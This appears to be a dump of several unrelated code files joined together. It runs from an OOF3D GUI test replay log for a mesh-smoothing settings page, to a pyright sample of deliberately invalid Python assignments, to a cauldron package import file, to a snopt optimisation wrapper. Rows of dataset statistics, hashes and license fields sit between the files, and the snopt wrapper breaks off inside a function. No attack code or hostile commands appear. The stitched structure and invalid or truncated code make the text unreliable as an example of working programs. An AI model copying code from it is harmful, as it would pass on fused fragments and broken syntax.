setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
#Selecting the microstructure '5color'
setComboBox(findWidget('OOF3D:Skeleton Page:Microstructure'), '5color')
checkpoint skeleton page sensitized
checkpoint skeleton page info updated
checkpoint skeleton page info updated
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '28')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((28,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Hide
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '24')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((24,))
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Hide
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '29')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((29,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '23')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((23,))
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
findMenu(findWidget('OOF3D:MenuBar'), 'File:Save:Python_Log').activate()
checkpoint toplevel widget mapped Dialog-Python_Log
findWidget('Dialog-Python_Log').resize(190, 95)
findWidget('Dialog-Python_Log:filename').set_text('skelpagesurfsmooth.log')
findWidget('Dialog-Python_Log:gtk-ok').clicked()
checkpoint OOF.File.Save.Python_Log
assert tests.filediff('skelpagesurfsmooth.log')
widget_0=findWidget('OOF3D')
handled_0=widget_0.event(event(gtk.gdk.DELETE,window=widget_0.window)) | 63.87746 | 161 | 0.8396 | 8,640 | 71,415 | 6.889699 | 0.041551 | 0.056546 | 0.051708 | 0.067264 | 0.958691 | 0.954542 | 0.944748 | 0.939389 | 0.938381 | 0.938381 | 0 | 0.039933 | 0.073584 | 71,415 | 1,118 | 162 | 63.87746 | 0.85981 | 0.014381 | 0 | 0.87135 | 0 | 0.029197 | 0.278765 | 0.084666 | 0 | 0 | 0 | 0 | 0.124088 | 0 | null | null | 0 | 0.000912 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
440b1e5e1ea330bdc10364b287379d7e2d438888 | 961 | py | Python | packages/pyright-internal/src/tests/samples/constants1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 4,391 | 2019-05-07T01:18:57.000Z | 2022-03-31T20:45:44.000Z | packages/pyright-internal/src/tests/samples/constants1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 2,740 | 2019-05-07T03:29:30.000Z | 2022-03-31T12:57:46.000Z | packages/pyright-internal/src/tests/samples/constants1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 455 | 2019-05-07T12:55:14.000Z | 2022-03-31T17:09:15.000Z | # This sample tests that the type checker flags certain values
# that cannot be deleted or assigned to.
# This should generate an error
True = 3
# This should generate an error
False = 4
# This should generate an error
None = True
# This should generate an error
__debug__ = 4
# This should generate an error
del True
# This should generate an error
del None
# This should generate an error
-3 = 2
# This should generate an error
[4] = [2]
# This should generate an error
[True] = [3]
# This should generate an error
(True) = 3
# This should generate an error
del -3
# This should generate an error
3 + 4 = 2
# This should generate an error
del 3 + 4
# This should generate an error
del -(4)
# This should generate an error
del __debug__
# This should generate an error
del {}
# This should generate an error
... = 3
# This should generate an error
del ...
# This should generate an error
(...) = 3
# This should generate an error
del ...
| 14.784615 | 62 | 0.705515 | 154 | 961 | 4.350649 | 0.181818 | 0.298507 | 0.537313 | 0.597015 | 0.843284 | 0.843284 | 0.597015 | 0.41194 | 0.41194 | 0.41194 | 0 | 0.024161 | 0.224766 | 961 | 64 | 63 | 15.015625 | 0.875168 | 0.727367 | 0 | 0.1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4453fdbf000f5801f56dbc110fe60e0baba414c7 | 173 | py | Python | cauldron/cli/sync/__init__.py | DanMayhew/cauldron | ac41481830fc1a363c145f4b58ce785aac054d10 | [
"MIT"
] | null | null | null | cauldron/cli/sync/__init__.py | DanMayhew/cauldron | ac41481830fc1a363c145f4b58ce785aac054d10 | [
"MIT"
] | null | null | null | cauldron/cli/sync/__init__.py | DanMayhew/cauldron | ac41481830fc1a363c145f4b58ce785aac054d10 | [
"MIT"
] | null | null | null | from cauldron.cli.sync import sync_io as io
from cauldron.cli.sync import files
from cauldron.cli.sync import comm
from cauldron.cli.sync.threads import send_remote_command
| 34.6 | 57 | 0.843931 | 30 | 173 | 4.766667 | 0.433333 | 0.335664 | 0.41958 | 0.531469 | 0.524476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104046 | 173 | 4 | 58 | 43.25 | 0.922581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
447bdfa1588e693079ed4c2a79721ffbd6f65096 | 8,334 | py | Python | lib/solver_interface/pyoptsolver/src/snopt-interface/pyscript/snoptWrapper.py | paperstiger/trajOptLib | 5e86a33537d89c0d1e35df7a436f9266fe817c49 | [
"MIT"
] | 6 | 2020-04-29T05:02:30.000Z | 2021-04-19T15:42:35.000Z | lib/solver_interface/pyoptsolver/src/snopt-interface/pyscript/snoptWrapper.py | paperstiger/trajOptLib | 5e86a33537d89c0d1e35df7a436f9266fe817c49 | [
"MIT"
] | null | null | null | lib/solver_interface/pyoptsolver/src/snopt-interface/pyscript/snoptWrapper.py | paperstiger/trajOptLib | 5e86a33537d89c0d1e35df7a436f9266fe817c49 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 Gao Tang <gt70@duke.edu>
#
# Distributed under terms of the MIT license.
"""
snoptWrapper.py
Wrapper functions for calling snopt
"""
import numpy as np
import libpysnopt as libsnopt
def parseResult(rst):
"""Parse the results returned by snopt and convert to a dict."""
return {'flag': rst.flag, 'obj': rst.obj, 'x': rst.sol, 'f': rst.fval}
def directSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like y = f(x) where x, y are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
else:
y = fun(x0)
nf = len(y)
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.directSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def inDirectSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like f(x, y) where x, y are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
assert nf is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.inDirectSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def gradSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like y, J = f(x) where x, y, J are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
else:
y = fun(x0)
nf = len(y)
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.gradSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def inGradSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like f(x, y, J) where x, y, J are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
assert nf is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.inGradSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def spGradSolve(fun, x0, nf=None, nG=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like y, spJ = f(x) where x, y are np.ndarray, J is scipy.sparse.csc_matrix
:param nf: int, length of y
:param nG: int, nnz of spJ
:param x0: np.ndarray (nx,) the initial guess to the solver
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
else:
y, spJ = fun(x0)
nf = len(y)
nG = spJ.nnz
if nG is None:
y, spJ = fun(x0)
nG = spJ.nnz
assert nf is not None
assert nG is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
